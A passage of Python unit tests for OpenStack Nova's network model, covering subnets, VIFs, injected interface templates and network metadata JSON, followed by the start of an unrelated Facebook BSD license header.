fixed_ip = model.FixedIP(address='192.168.1.100')
for i in range(10):
fixed_ip.add_floating_ip('192.168.1.101')
self.assertEqual(['192.168.1.101'], fixed_ip['floating_ips'])
class SubnetTests(test.NoDBTestCase):
def test_create_subnet_with_attrs(self):
subnet = fake_network_cache_model.new_subnet()
route1 = fake_network_cache_model.new_route()
self.assertEqual('10.10.0.0/24', subnet['cidr'])
self.assertEqual(
[fake_network_cache_model.new_ip(dict(address='1.2.3.4')),
fake_network_cache_model.new_ip(dict(address='2.3.4.5'))],
subnet['dns'])
self.assertEqual('10.10.0.1', subnet['gateway']['address'])
self.assertEqual(
[fake_network_cache_model.new_fixed_ip(
dict(address='10.10.0.2')),
fake_network_cache_model.new_fixed_ip(
dict(address='10.10.0.3'))], subnet['ips'])
self.assertEqual([route1], subnet['routes'])
self.assertEqual(4, subnet['version'])
def test_subnet_equal(self):
subnet1 = fake_network_cache_model.new_subnet()
subnet2 = fake_network_cache_model.new_subnet()
self.assertEqual(subnet1, subnet2)
def test_subnet_not_equal(self):
subnet1 = model.Subnet(cidr='1.1.1.0/24')
subnet2 = model.Subnet(cidr='2.2.2.0/24')
self.assertNotEqual(subnet1, subnet2)
subnet1 = model.Subnet(dns='1.1.1.0/24')
subnet2 = model.Subnet(dns='2.2.2.0/24')
self.assertNotEqual(subnet1, subnet2)
subnet1 = model.Subnet(gateway='1.1.1.1/24')
subnet2 = model.Subnet(gateway='2.2.2.1/24')
self.assertNotEqual(subnet1, subnet2)
subnet1 = model.Subnet(ips='1.1.1.0/24')
subnet2 = model.Subnet(ips='2.2.2.0/24')
self.assertNotEqual(subnet1, subnet2)
subnet1 = model.Subnet(routes='1.1.1.0/24')
subnet2 = model.Subnet(routes='2.2.2.0/24')
self.assertNotEqual(subnet1, subnet2)
subnet1 = model.Subnet(version='4')
subnet2 = model.Subnet(version='6')
self.assertNotEqual(subnet1, subnet2)
def test_add_route(self):
subnet = fake_network_cache_model.new_subnet()
route1 = fake_network_cache_model.new_route()
route2 = fake_network_cache_model.new_route({'cidr': '1.1.1.1/24'})
subnet.add_route(route2)
self.assertEqual([route1, route2], subnet['routes'])
def test_add_route_a_lot(self):
subnet = fake_network_cache_model.new_subnet()
route1 = fake_network_cache_model.new_route()
route2 = fake_network_cache_model.new_route({'cidr': '1.1.1.1/24'})
for i in range(10):
subnet.add_route(route2)
self.assertEqual([route1, route2], subnet['routes'])
def test_add_dns(self):
subnet = fake_network_cache_model.new_subnet()
dns = fake_network_cache_model.new_ip(dict(address='9.9.9.9'))
subnet.add_dns(dns)
self.assertEqual(
[fake_network_cache_model.new_ip(dict(address='1.2.3.4')),
fake_network_cache_model.new_ip(dict(address='2.3.4.5')),
fake_network_cache_model.new_ip(dict(address='9.9.9.9'))],
subnet['dns'])
def test_add_dns_a_lot(self):
subnet = fake_network_cache_model.new_subnet()
for i in range(10):
subnet.add_dns(fake_network_cache_model.new_ip(
dict(address='9.9.9.9')))
self.assertEqual(
[fake_network_cache_model.new_ip(dict(address='1.2.3.4')),
fake_network_cache_model.new_ip(dict(address='2.3.4.5')),
fake_network_cache_model.new_ip(dict(address='9.9.9.9'))],
subnet['dns'])
def test_add_ip(self):
subnet = fake_network_cache_model.new_subnet()
subnet.add_ip(fake_network_cache_model.new_ip(
dict(address='192.168.1.102')))
self.assertEqual(
[fake_network_cache_model.new_fixed_ip(
dict(address='10.10.0.2')),
fake_network_cache_model.new_fixed_ip(
dict(address='10.10.0.3')),
fake_network_cache_model.new_ip(
dict(address='192.168.1.102'))], subnet['ips'])
def test_add_ip_a_lot(self):
subnet = fake_network_cache_model.new_subnet()
for i in range(10):
subnet.add_ip(fake_network_cache_model.new_fixed_ip(
dict(address='192.168.1.102')))
self.assertEqual(
[fake_network_cache_model.new_fixed_ip(
dict(address='10.10.0.2')),
fake_network_cache_model.new_fixed_ip(
dict(address='10.10.0.3')),
fake_network_cache_model.new_fixed_ip(
dict(address='192.168.1.102'))], subnet['ips'])
def test_hydrate(self):
subnet_dict = {
'cidr': '255.255.255.0',
'dns': [fake_network_cache_model.new_ip(dict(address='1.1.1.1'))],
'ips': [fake_network_cache_model.new_fixed_ip(
dict(address='2.2.2.2'))],
'routes': [fake_network_cache_model.new_route()],
'version': 4,
'gateway': fake_network_cache_model.new_ip(
dict(address='3.3.3.3'))}
subnet = model.Subnet.hydrate(subnet_dict)
self.assertEqual('255.255.255.0', subnet['cidr'])
self.assertEqual([fake_network_cache_model.new_ip(
dict(address='1.1.1.1'))], subnet['dns'])
self.assertEqual('3.3.3.3', subnet['gateway']['address'])
self.assertEqual([fake_network_cache_model.new_fixed_ip(
dict(address='2.2.2.2'))], subnet['ips'])
self.assertEqual([fake_network_cache_model.new_route()],
subnet['routes'])
self.assertEqual(4, subnet['version'])
class NetworkTests(test.NoDBTestCase):
def test_create_network(self):
network = fake_network_cache_model.new_network()
self.assertEqual(1, network['id'])
self.assertEqual('br0', network['bridge'])
self.assertEqual('public', network['label'])
self.assertEqual(
[fake_network_cache_model.new_subnet(),
fake_network_cache_model.new_subnet(
dict(cidr='255.255.255.255'))], network['subnets'])
def test_add_subnet(self):
network = fake_network_cache_model.new_network()
network.add_subnet(fake_network_cache_model.new_subnet(
dict(cidr='0.0.0.0')))
self.assertEqual(
[fake_network_cache_model.new_subnet(),
fake_network_cache_model.new_subnet(
dict(cidr='255.255.255.255')),
fake_network_cache_model.new_subnet(dict(cidr='0.0.0.0'))],
network['subnets'])
def test_add_subnet_a_lot(self):
network = fake_network_cache_model.new_network()
for i in range(10):
network.add_subnet(fake_network_cache_model.new_subnet(
dict(cidr='0.0.0.0')))
self.assertEqual(
[fake_network_cache_model.new_subnet(),
fake_network_cache_model.new_subnet(
dict(cidr='255.255.255.255')),
fake_network_cache_model.new_subnet(dict(cidr='0.0.0.0'))],
network['subnets'])
def test_network_equal(self):
network1 = model.Network()
network2 = model.Network()
self.assertEqual(network1, network2)
def test_network_not_equal(self):
network1 = model.Network(id='1')
network2 = model.Network(id='2')
self.assertNotEqual(network1, network2)
network1 = model.Network(bridge='br-int')
network2 = model.Network(bridge='br0')
self.assertNotEqual(network1, network2)
network1 = model.Network(label='net1')
network2 = model.Network(label='net2')
self.assertNotEqual(network1, network2)
network1 = model.Network(subnets='1.1.1.0/24')
network2 = model.Network(subnets='2.2.2.0/24')
self.assertNotEqual(network1, network2)
def test_hydrate(self):
fake_network_cache_model.new_subnet()
fake_network_cache_model.new_subnet(dict(cidr='255.255.255.255'))
network = model.Network.hydrate(fake_network_cache_model.new_network())
self.assertEqual(1, network['id'])
self.assertEqual('br0', network['bridge'])
self.assertEqual('public', network['label'])
self.assertEqual(
[fake_network_cache_model.new_subnet(),
fake_network_cache_model.new_subnet(
dict(cidr='255.255.255.255'))], network['subnets'])
class VIFTests(test.NoDBTestCase):
def test_create_vif(self):
vif = fake_network_cache_model.new_vif()
self.assertEqual(1, vif['id'])
self.assertEqual('aa:aa:aa:aa:aa:aa', vif['address'])
self.assertEqual(fake_network_cache_model.new_network(),
vif['network'])
def test_vif_equal(self):
vif1 = model.VIF()
vif2 = model.VIF()
self.assertEqual(vif1, vif2)
def test_vif_not_equal(self):
vif1 = model.VIF(id=1)
vif2 = model.VIF(id=2)
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(address='00:00:00:00:00:11')
vif2 = model.VIF(address='00:00:00:00:00:22')
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(network='net1')
vif2 = model.VIF(network='net2')
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(type='ovs')
vif2 = model.VIF(type='linuxbridge')
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(devname='ovs1234')
vif2 = model.VIF(devname='linuxbridge1234')
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(qbh_params=1)
vif2 = model.VIF(qbh_params=None)
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(qbg_params=1)
vif2 = model.VIF(qbg_params=None)
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(active=True)
vif2 = model.VIF(active=False)
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(vnic_type=model.VNIC_TYPE_NORMAL)
vif2 = model.VIF(vnic_type=model.VNIC_TYPE_DIRECT)
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(profile={'pci_slot': '0000:0a:00.1'})
vif2 = model.VIF(profile={'pci_slot': '0000:0a:00.2'})
self.assertNotEqual(vif1, vif2)
vif1 = model.VIF(preserve_on_delete=True)
vif2 = model.VIF(preserve_on_delete=False)
self.assertNotEqual(vif1, vif2)
def test_create_vif_with_type(self):
vif_dict = dict(
id=1,
address='aa:aa:aa:aa:aa:aa',
network=fake_network_cache_model.new_network(),
type='bridge')
vif = fake_network_cache_model.new_vif(vif_dict)
self.assertEqual(1, vif['id'])
self.assertEqual('aa:aa:aa:aa:aa:aa', vif['address'])
self.assertEqual('bridge', vif['type'])
self.assertEqual(fake_network_cache_model.new_network(),
vif['network'])
def test_vif_get_fixed_ips(self):
vif = fake_network_cache_model.new_vif()
fixed_ips = vif.fixed_ips()
ips = [
fake_network_cache_model.new_fixed_ip(dict(address='10.10.0.2')),
fake_network_cache_model.new_fixed_ip(dict(address='10.10.0.3'))
] * 2
self.assertEqual(fixed_ips, ips)
def test_vif_get_floating_ips(self):
vif = fake_network_cache_model.new_vif()
vif['network']['subnets'][0]['ips'][0].add_floating_ip('192.168.1.1')
floating_ips = vif.floating_ips()
self.assertEqual(['192.168.1.1'], floating_ips)
def test_vif_get_labeled_ips(self):
vif = fake_network_cache_model.new_vif()
labeled_ips = vif.labeled_ips()
ip_dict = {
'network_id': 1,
'ips': [fake_network_cache_model.new_ip(
{'address': '10.10.0.2', 'type': 'fixed'}),
fake_network_cache_model.new_ip(
{'address': '10.10.0.3', 'type': 'fixed'})] * 2,
'network_label': 'public'}
self.assertEqual(ip_dict, labeled_ips)
def test_hydrate(self):
fake_network_cache_model.new_network()
vif = model.VIF.hydrate(fake_network_cache_model.new_vif())
self.assertEqual(1, vif['id'])
self.assertEqual('aa:aa:aa:aa:aa:aa', vif['address'])
self.assertEqual(fake_network_cache_model.new_network(),
vif['network'])
def test_hydrate_vif_with_type(self):
vif_dict = dict(
id=1,
address='aa:aa:aa:aa:aa:aa',
network=fake_network_cache_model.new_network(),
type='bridge')
vif = model.VIF.hydrate(fake_network_cache_model.new_vif(vif_dict))
self.assertEqual(1, vif['id'])
self.assertEqual('aa:aa:aa:aa:aa:aa', vif['address'])
self.assertEqual('bridge', vif['type'])
self.assertEqual(fake_network_cache_model.new_network(),
vif['network'])
class NetworkInfoTests(test.NoDBTestCase):
def test_create_model(self):
ninfo = model.NetworkInfo([fake_network_cache_model.new_vif(),
fake_network_cache_model.new_vif(
{'address': 'bb:bb:bb:bb:bb:bb'})])
self.assertEqual(
[fake_network_cache_model.new_fixed_ip(
{'address': '10.10.0.2'}),
fake_network_cache_model.new_fixed_ip(
{'address': '10.10.0.3'})] * 4, ninfo.fixed_ips())
def test_create_async_model(self):
def async_wrapper():
return model.NetworkInfo(
[fake_network_cache_model.new_vif(),
fake_network_cache_model.new_vif(
{'address': 'bb:bb:bb:bb:bb:bb'})])
ninfo = model.NetworkInfoAsyncWrapper(async_wrapper)
self.assertEqual(
[fake_network_cache_model.new_fixed_ip(
{'address': '10.10.0.2'}),
fake_network_cache_model.new_fixed_ip(
{'address': '10.10.0.3'})] * 4, ninfo.fixed_ips())
def test_create_async_model_exceptions(self):
def async_wrapper():
raise test.TestingException()
ninfo = model.NetworkInfoAsyncWrapper(async_wrapper)
self.assertRaises(test.TestingException, ninfo.wait)
# 2nd one doesn't raise
self.assertIsNone(ninfo.wait())
# Test that do_raise=False works on .wait()
ninfo = model.NetworkInfoAsyncWrapper(async_wrapper)
self.assertIsNone(ninfo.wait(do_raise=False))
# Test we also raise calling a method
ninfo = model.NetworkInfoAsyncWrapper(async_wrapper)
self.assertRaises(test.TestingException, ninfo.fixed_ips)
def test_get_floating_ips(self):
vif = fake_network_cache_model.new_vif()
vif['network']['subnets'][0]['ips'][0].add_floating_ip('192.168.1.1')
ninfo = model.NetworkInfo([vif,
fake_network_cache_model.new_vif(
{'address': 'bb:bb:bb:bb:bb:bb'})])
self.assertEqual(['192.168.1.1'], ninfo.floating_ips())
def test_hydrate(self):
ninfo = model.NetworkInfo([fake_network_cache_model.new_vif(),
fake_network_cache_model.new_vif(
{'address': 'bb:bb:bb:bb:bb:bb'})])
model.NetworkInfo.hydrate(ninfo)
self.assertEqual(
[fake_network_cache_model.new_fixed_ip(
{'address': '10.10.0.2'}),
fake_network_cache_model.new_fixed_ip(
{'address': '10.10.0.3'})] * 4, ninfo.fixed_ips())
def _setup_injected_network_scenario(self, should_inject=True,
use_ipv4=True, use_ipv6=False,
gateway=True, dns=True,
two_interfaces=False,
libvirt_virt_type=None):
"""Check that netutils properly decides whether to inject based on
whether the supplied subnet is static or dynamic.
"""
network = fake_network_cache_model.new_network({'subnets': []})
subnet_dict = {}
if not gateway:
subnet_dict['gateway'] = None
if not dns:
subnet_dict['dns'] = None
if not should_inject:
subnet_dict['dhcp_server'] = '10.10.0.1'
if use_ipv4:
network.add_subnet(
fake_network_cache_model.new_subnet(subnet_dict))
if should_inject and use_ipv6:
gateway_ip = fake_network_cache_model.new_ip(dict(
address='1234:567::1'))
ip = fake_network_cache_model.new_ip(dict(
address='1234:567::2'))
ipv6_subnet_dict = dict(
cidr='1234:567::/48',
gateway=gateway_ip,
dns=[fake_network_cache_model.new_ip(
dict(address='2001:4860:4860::8888')),
fake_network_cache_model.new_ip(
dict(address='2001:4860:4860::8844'))],
ips=[ip])
if not gateway:
ipv6_subnet_dict['gateway'] = None
network.add_subnet(fake_network_cache_model.new_subnet(
ipv6_subnet_dict))
# Behave as though CONF.flat_injected is True
network['meta']['injected'] = True
vif = fake_network_cache_model.new_vif({'network': network})
vifs = [vif]
if two_interfaces:
vifs.append(vif)
nwinfo = model.NetworkInfo(vifs)
return netutils.get_injected_network_template(
nwinfo, use_ipv6=use_ipv6, libvirt_virt_type=libvirt_virt_type)
def test_injection_dynamic(self):
expected = None
template = self._setup_injected_network_scenario(should_inject=False)
self.assertEqual(expected, template)
def test_injection_static(self):
expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
"""
template = self._setup_injected_network_scenario()
self.assertEqual(expected, template)
def test_injection_static_no_gateway(self):
expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
dns-nameservers 1.2.3.4 2.3.4.5
"""
template = self._setup_injected_network_scenario(gateway=False)
self.assertEqual(expected, template)
def test_injection_static_no_dns(self):
expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
"""
template = self._setup_injected_network_scenario(dns=False)
self.assertEqual(expected, template)
def test_injection_static_overriden_template(self):
cfg.CONF.set_override(
'injected_network_template',
'nova/tests/unit/network/interfaces-override.template')
expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip route add 0.0.0.0/24 via 192.168.1.1 dev eth0
pre-down ip route del 0.0.0.0/24 via 192.168.1.1 dev eth0
"""
template = self._setup_injected_network_scenario()
self.assertEqual(expected, template)
def test_injection_static_ipv6(self):
expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
iface eth0 inet6 static
hwaddress ether aa:aa:aa:aa:aa:aa
address 1234:567::2
netmask 48
gateway 1234:567::1
dns-nameservers 2001:4860:4860::8888 2001:4860:4860::8844
"""
template = self._setup_injected_network_scenario(use_ipv6=True)
self.assertEqual(expected, template)
def test_injection_static_ipv6_no_gateway(self):
expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
dns-nameservers 1.2.3.4 2.3.4.5
iface eth0 inet6 static
hwaddress ether aa:aa:aa:aa:aa:aa
address 1234:567::2
netmask 48
dns-nameservers 2001:4860:4860::8888 2001:4860:4860::8844
"""
template = self._setup_injected_network_scenario(use_ipv6=True,
gateway=False)
self.assertEqual(expected, template)
def test_injection_static_with_ipv4_off(self):
expected = None
template = self._setup_injected_network_scenario(use_ipv4=False)
self.assertEqual(expected, template)
def test_injection_ipv6_two_interfaces(self):
expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
iface eth0 inet6 static
hwaddress ether aa:aa:aa:aa:aa:aa
address 1234:567::2
netmask 48
gateway 1234:567::1
dns-nameservers 2001:4860:4860::8888 2001:4860:4860::8844
auto eth1
iface eth1 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
iface eth1 inet6 static
hwaddress ether aa:aa:aa:aa:aa:aa
address 1234:567::2
netmask 48
gateway 1234:567::1
dns-nameservers 2001:4860:4860::8888 2001:4860:4860::8844
"""
template = self._setup_injected_network_scenario(use_ipv6=True,
two_interfaces=True)
self.assertEqual(expected, template)
def test_injection_ipv6_with_lxc(self):
expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip -6 addr add 1234:567::2/48 dev ${IFACE}
post-up ip -6 route add default via 1234:567::1 dev ${IFACE}
auto eth1
iface eth1 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip -6 addr add 1234:567::2/48 dev ${IFACE}
post-up ip -6 route add default via 1234:567::1 dev ${IFACE}
"""
template = self._setup_injected_network_scenario(
use_ipv6=True, two_interfaces=True, libvirt_virt_type='lxc')
self.assertEqual(expected, template)
def test_injection_ipv6_with_lxc_no_gateway(self):
expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip -6 addr add 1234:567::2/48 dev ${IFACE}
auto eth1
iface eth1 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip -6 addr add 1234:567::2/48 dev ${IFACE}
"""
template = self._setup_injected_network_scenario(
use_ipv6=True, gateway=False, two_interfaces=True,
libvirt_virt_type='lxc')
self.assertEqual(expected, template)
class TestNetworkMetadata(test.NoDBTestCase):
def setUp(self):
super(TestNetworkMetadata, self).setUp()
self.netinfo = model.NetworkInfo([fake_network_cache_model.new_vif(
{'type': 'ethernet'})])
# Give this vif ipv4 and ipv6 dhcp subnets
ipv4_subnet = fake_network_cache_model.new_subnet(version=4)
ipv6_subnet = fake_network_cache_model.new_subnet(version=6)
self.netinfo[0]['network']['subnets'][0] = ipv4_subnet
self.netinfo[0]['network']['subnets'][1] = ipv6_subnet
self.netinfo[0]['network']['meta']['mtu'] = 1500
def test_get_network_metadata_json(self):
net_metadata = netutils.get_network_metadata(self.netinfo,
use_ipv6=True)
# Physical Ethernet
self.assertEqual(
{
'id': 'interface0',
'type': 'phy',
'ethernet_mac_address': 'aa:aa:aa:aa:aa:aa',
'vif_id': 1,
'mtu': 1500
},
net_metadata['links'][0])
# IPv4 Network
self.assertEqual(
{
'id': 'network0',
'link': 'interface0',
'type': 'ipv4',
'ip_address': '10.10.0.2',
'netmask': '255.255.255.0',
'routes': [
{
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'gateway': '10.10.0.1'
},
{
'network': '0.0.0.0',
'netmask': '255.255.255.0',
'gateway': '192.168.1.1'
}
],
'network_id': 1
},
net_metadata['networks'][0])
self.assertEqual(
{
'id': 'network1',
'link': 'interface0',
'type': 'ipv6',
'ip_address': 'fd00::2',
'netmask': 'ffff:ffff:ffff::',
'routes': [
{
'network': '::',
'netmask': '::',
'gateway': 'fd00::1'
},
{
'network': '::',
'netmask': 'ffff:ffff:ffff::',
'gateway': 'fd00::1:1'
}
],
'network_id': 1
},
net_metadata['networks'][1])
def test_get_network_metadata_json_dhcp(self):
ipv4_subnet = fake_network_cache_model.new_subnet(
subnet_dict=dict(dhcp_server='1.1.1.1'), version=4)
ipv6_subnet = fake_network_cache_model.new_subnet(
subnet_dict=dict(dhcp_server='1234:567::'), version=6)
self.netinfo[0]['network']['subnets'][0] = ipv4_subnet
self.netinfo[0]['network']['subnets'][1] = ipv6_subnet
net_metadata = netutils.get_network_metadata(self.netinfo,
use_ipv6=True)
# IPv4 Network
self.assertEqual(
{
'id': 'network0',
'link': 'interface0',
'type': 'ipv4_dhcp',
'network_id': 1
},
net_metadata['networks'][0])
# IPv6 Network
self.assertEqual(
{
'id': 'network1',
'link': 'interface0',
'type': 'ipv6_dhcp',
'network_id': 1
},
net_metadata['networks'][1])
def test__get_nets(self):
expected_net = {
'id': 'network0',
'ip_address': '10.10.0.2',
'link': 1,
'netmask': '255.255.255.0',
'network_id': 1,
'routes': [
{
'gateway': '10.10.0.1',
'netmask': '0.0.0.0',
'network': '0.0.0.0'},
{
'gateway': '192.168.1.1',
'netmask': '255.255.255.0',
'network': '0.0.0.0'}],
'type': 'ipv4'
}
net = netutils._get_nets(
self.netinfo[0], self.netinfo[0]['network']['subnets'][0], 4, 0, 1)
self.assertEqual(expected_net, net)
def test__get_eth_link(self):
expected_link = {
'id': 'interface0',
'vif_id': 1,
'type': 'vif',
'ethernet_mac_address': 'aa:aa:aa:aa:aa:aa',
'mtu': 1500
}
self.netinfo[0]['type'] = 'vif'
link = netutils._get_eth_link(self.netinfo[0], 0)
self.assertEqual(expected_link, link)
def test__get_eth_link_physical(self):
expected_link = {
'id': 'interface1',
'vif_id': 1,
'type': 'phy',
'ethernet_mac_address': 'aa:aa:aa:aa:aa:aa',
'mtu': 1500
}
link = netutils._get_eth_link(self.netinfo[0], 1)
self.assertEqual(expected_link, link)
def test__get_default_route(self):
v4_expected = [{
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'gateway': '10.10.0.1',
}]
v6_expected = [{
'network': '::',
'netmask': '::',
'gateway': 'fd00::1'
}]
v4 = netutils._get_default_route(
4, self.netinfo[0]['network']['subnets'][0])
self.assertEqual(v4_expected, v4)
v6 = netutils._get_default_route(
6, self.netinfo[0]['network']['subnets'][1])
self.assertEqual(v6_expected, v6)
# Test for no gateway
self.netinfo[0]['network']['subnets'][0]['gateway'] = None
no_route = netutils._get_default_route(
4, self.netinfo[0]['network']['subnets'][0])
self.assertEqual([], no_route)
def test__get_dns_services(self):
expected_dns = [
{'type': 'dns', 'address': '1.2.3.4'},
{'type': 'dns', 'address': '2.3.4.5'},
{'type': 'dns', 'address': '3.4.5.6'}
]
subnet = fake_network_cache_model.new_subnet(version=4)
subnet['dns'].append(fake_network_cache_model.new_ip(
{'address': '3.4.5.6'}))
dns = netutils._get_dns_services(subnet)
self.assertEqual(expected_dns, dns)
def test_get_network_metadata(self):
expected_json = {
"links": [
{
"ethernet_mac_address": "aa:aa:aa:aa:aa:aa",
"id": "interface0",
"type": "phy",
"vif_id": 1,
"mtu": 1500
},
{
"ethernet_mac_address": "aa:aa:aa:aa:aa:ab",
"id": "interface1",
"type": "phy",
"vif_id": 1,
"mtu": 1500
},
],
"networks": [
{
"id": "network0",
"ip_address": "10.10.0.2",
"link": "interface0",
"netmask": "255.255.255.0",
"network_id":
"00000000-0000-0000-0000-000000000000",
"routes": [
{
"gateway": "10.10.0.1",
"netmask": "0.0.0.0",
"network": "0.0.0.0"
},
{
"gateway": "192.168.1.1",
"netmask": "255.255.255.0",
"network": "0.0.0.0"
}
],
"type": "ipv4"
},
{
'id': 'network1',
'ip_address': 'fd00::2',
'link': 'interface0',
'netmask': 'ffff:ffff:ffff::',
'network_id': '00000000-0000-0000-0000-000000000000',
'routes': [{'gateway': 'fd00::1',
'netmask': '::',
'network': '::'},
{'gateway': 'fd00::1:1',
'netmask': 'ffff:ffff:ffff::',
'network': '::'}],
'type': 'ipv6'
},
{
"id": "network2",
"ip_address": "192.168.0.2",
"link": "interface1",
"netmask": "255.255.255.0",
"network_id":
"11111111-1111-1111-1111-111111111111",
"routes": [
{
"gateway": "192.168.0.1",
"netmask": "0.0.0.0",
"network": "0.0.0.0"
}
],
"type": "ipv4"
}
],
'services': [
{'address': '1.2.3.4', 'type': 'dns'},
{'address': '2.3.4.5', 'type': 'dns'},
{'address': '1:2:3:4::', 'type': 'dns'},
{'address': '2:3:4:5::', 'type': 'dns'}
]
}
self.netinfo[0]['network']['id'] = (
'00000000-0000-0000-0000-000000000000')
# Add a second NIC
self.netinfo.append(fake_network_cache_model.new_vif({
'type': 'ethernet', 'address': 'aa:aa:aa:aa:aa:ab'}))
address = fake_network_cache_model.new_ip({'address': '192.168.0.2'})
gateway_address = fake_network_cache_model.new_ip(
{'address': '192.168.0.1'})
ipv4_subnet = fake_network_cache_model.new_subnet(
{'cidr': '192.168.0.0/24', 'gateway': gateway_address,
'ips': [address], 'routes': []})
self.netinfo[1]['network']['id'] = (
'11111111-1111-1111-1111-111111111111')
self.netinfo[1]['network']['subnets'][0] = ipv4_subnet
self.netinfo[1]['network']['meta']['mtu'] = 1500
network_json = netutils.get_network_metadata(self.netinfo)
self.assertEqual(expected_json, network_json)
def test_get_network_metadata_no_ipv4(self):
expected_json = {
"services": [
{
"type": "dns",
"address": "1:2:3:4::"
},
{
"type": "dns",
"address": "2:3:4:5::"
}
],
"networks": [
{
"network_id": 1,
"type": "ipv6",
"netmask": "ffff:ffff:ffff::",
"link": "interface0",
"routes": [
{
"netmask": "::",
"network": "::",
"gateway": "fd00::1"
},
{
"netmask": "ffff:ffff:ffff::",
"network": "::",
"gateway": "fd00::1:1"
}
],
"ip_address": "fd00::2",
"id": "network0"
}
],
"links": [
{
"ethernet_mac_address": "aa:aa:aa:aa:aa:aa",
"mtu": 1500,
"type": "phy",
"id": "interface0",
"vif_id": 1
}
]
}
# drop the ipv4 subnet
self.netinfo[0]['network']['subnets'].pop(0)
network_json = netutils.get_network_metadata(self.netinfo)
self.assertEqual(expected_json, network_json)
| |
# Copyright 2014-present Facebook, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name Facebook nor the names of its contributors may be used to
# endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
